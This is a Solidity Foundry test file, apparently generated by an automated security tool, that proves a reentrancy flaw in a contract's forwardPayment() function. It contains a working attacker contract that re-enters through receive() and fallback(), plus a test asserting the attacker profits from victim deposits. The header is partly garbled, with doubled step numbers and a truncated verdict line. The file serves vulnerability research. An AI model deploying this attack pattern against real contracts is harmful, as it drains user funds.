// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #3 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      unchecked_call
 * FUNCTION:      forwardPayment
 * VULNERABILITY: REENTRANCY
 * SEVERITY:      medium
 * CONFIDENCE:    100.0%
 * VERDICT:       EXPLOITABLE: forwardPayment() — Z3 SAT with concrete values, invariant 'no_free_money' violated. Att
 *
 * ATTACK STEPS:
 *   1. 1. Attacker deploys malicious contract with receive()/fallback()
 *   2. 2. Attacker deposits 0.000001 ETH → forwardPayment() records balance
 *   3. 3. Attacker calls forwardPayment()
 *   4. 4. Contract sends 0.000001 ETH via .call{value} BEFORE updating state
 *   5. 5. Attacker's receive() re-enters forwardPayment()
 *   6. 6. require(balances[attacker] >= amount) PASSES — balance not yet decremented
 *   7. 7. Contract sends 0.000001 ETH AGAIN
 *   8. 8. State finally updates — but attacker already received 2x
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-13 02:40
 */

import "../../unchecked_call.sol";

/// @notice Attacker contract that exploits reentrancy in unchecked_call.forwardPayment
contract ReentrancyAttacker {
    unchecked_call public target;
    uint256 public attackCount;
    uint256 public attackAmount;

    constructor(address _target) {
        target = unchecked_call(payable(_target));
    }

    function attack() external payable {
        attackAmount = msg.value;
        // Step 1: Deposit to become a valid user
        // No payable deposit found -- manual setup may be needed
        // Step 2: Trigger the vulnerable function
        target.forwardPayment();
    }

    // Step 3: Re-enter on ETH receive
    receive() external payable {
        if (attackCount < 3 && address(target).balance >= attackAmount) {
            attackCount++;
            target.forwardPayment();
        }
    }

    fallback() external payable {
        if (attackCount < 3 && address(target).balance >= attackAmount) {
            attackCount++;
            target.forwardPayment();
        }
    }
}

contract PoC_Reentrancy_unchecked_call_Test is Test {
    unchecked_call public vulnerable;
    ReentrancyAttacker public attacker;

    function setUp() public {
        // Deploy the REAL vulnerable contract
        vulnerable = new unchecked_call();
        attacker = new ReentrancyAttacker(address(vulnerable));

        // Fund the contract with victim deposits
        address victim = makeAddr("victim");
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vulnerable.deposit{value: 10 ether}();
    }

    function test_reentrancy_exploit() public {
        console.log("=== AGL PoC: Reentrancy in unchecked_call.forwardPayment ===");

        uint256 contractBefore = address(vulnerable).balance;
        console.log("Contract balance before:", contractBefore / 1e18, "ETH");

        // Execute reentrancy attack with 1 ETH
        vm.deal(address(attacker), 1 ether);
        attacker.attack{value: 1 ether}();

        uint256 contractAfter = address(vulnerable).balance;
        uint256 attackerBalance = address(attacker).balance;
        console.log("Contract balance after:", contractAfter / 1e18, "ETH");
        console.log("Attacker profit:", attackerBalance / 1e18, "ETH");

        // The attacker should have more than their initial 1 ETH
        assertGt(attackerBalance, 1 ether, "Reentrancy exploit: attacker should profit");
        console.log("[CONFIRMED] Reentrancy vulnerability exploited!");
    }
}
